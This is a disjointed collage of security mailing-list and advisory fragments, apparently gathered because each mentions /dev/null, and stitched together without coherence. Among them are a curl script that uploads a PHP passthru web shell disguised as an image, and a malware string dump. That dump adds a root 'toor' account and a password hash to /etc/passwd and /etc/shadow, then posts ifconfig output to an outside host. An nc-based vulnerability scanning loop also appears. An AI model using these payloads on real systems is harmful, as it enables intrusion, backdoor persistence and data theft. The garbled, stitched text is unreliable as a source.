//OK, it is, lets register the IP in a variable for later use:
$ GoogleHost=74.125.65.106
//Lets verify it is working now:
$ wget http://$GoogleHost/ -O /dev/null -T 5
- --2009-08-16 21:15:05-- http://74.125.65.106/
Connecting to 74.125.65.106:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: `/dev/null'
echo "<? print passthru(\$_REQUEST['cmd']); ?>" > evilimage.jpg.php
echo "Registering user"
curl -c cookiejar -d
"user=hacker&pass=31337&email=foo%40bar.com&company_name=&first_name=Hack&last_name=Errr&phone=123+123+1234&alt_phone=&fax=&country=1&state=Badakhshan&city=&address=&zip=&submit=Submit&agree=agree"
"$target/register.php" >/dev/null 2>&1
echo "Login"
curl -b cookiejar -c cookiejar -d "user=hacker&pass=31337&submit=Login"
"$target/login.php" >/dev/null 2>&1
echo "Upload command shell as user image"
curl -b cookiejar -c cookiejar -F "image=@evilimage.jpg.php" -F
Program received signal SIGSEGV, Segmentation fault.
0x08051c03 in ?? ()
(gdb) x/i $eip
0x8051c03: push %ebx
# find Y CX >> /dev/null
Segmentation fault (core dumped)
find(1) also fails!
+++ b/linker/linker.c
@@ -1563,13 +1563,13 @@ static int link_image(soinfo *si, unsigned wr_offset)
}
#endif
- /* If this is a SETUID programme, dup /dev/null to openned stdin,
+ /* If this is a SET?ID program, dup /dev/null to openned stdin,
stdout and stderr to close a security hole described in:
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:23.stdio.asc
>
> Thank you for your time and look forward to some more answers.
>
> Sincerely,
> Aras "Russ" Memisyazici
> arasm {at) vt ^dot^ edu --> I set my return addy to /dev/null for... well
> you know why!
>
> Systems Administrator
> Virginia Tech
>
>>>
>>> Thank you for your time and look forward to some more answers.
>>>
>>> Sincerely,
>>> Aras "Russ" Memisyazici
>>> arasm {at) vt ^dot^ edu --> I set my return addy to /dev/null
>>> for... well
>>> you know why!
>>>
>>> Systems Administrator
>>> Virginia Tech
newbie:\$1\$nLv4Q0aJ\$rV4IkBgFH1NMo\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow^@^@echo
toor:x:0:0:toor:/var:/bin/sh >> /etc/passwd^@^@^@^@echo
newbie:x:10000:65534:toor:/var/tmp:/bin/sh >>
/etc/passwd^@/usr/bin/curl^@^@^@^@/usr/bin/curl -d
"user=newbie&pass=novice&target=$(ifconfig -a)"
http://www.trancefix.org/hell/save.php > /dev/null
2&>/dev/null^@^@^@^@Trying to connect to %s port %d
----------------------------------------------------------------------
Thank you for your time and look forward to some more answers.
Sincerely,
Aras "Russ" Memisyazici
arasm {at) vt ^dot^ edu --> I set my return addy to /dev/null for... well
you know why!
Systems Administrator
Virginia Tech
"Extended Support Phase" includes "Security Update Support". If I have
a Premier Support contract (which entitles me to Extended Support)
aren't MS contractually obliged to make this fix available to me?
2009/9/16 Aras "Russ" Memisyazici <nowhere@devnull.com>:
> :)
>
> Thank you all for your valuable comments... Indeed I appreciated some of the
> links/info extended (Susan, Thor and Tom) However, in the end, it sounded
> like:
fi
for i in `cat $1`
do
if echo -en "<PROCHECKUP> / HTTP/1.1\nHost: $i\nConnection: close\nContent-length: 0\nContent-length: 0\n\n" | nc -w 4 $i 80 | grep -i '<PROCHECKUP>' > /dev/null
then
echo "$i is VULNERABLE!"
fi
done
on current Solaris, IRIX and Linux systems. On systems with this
non-standard behavior, Postfix may be vulnerable depending on how
it is configured.
Postfix allows a root-owned symlink as a local mail destination,
so that mail can be delivered to e.g. /dev/null which is a symlink
on Solaris.
2. What configurations are (not) affected
=========================================
A configuration is considered affected when an attacker with local
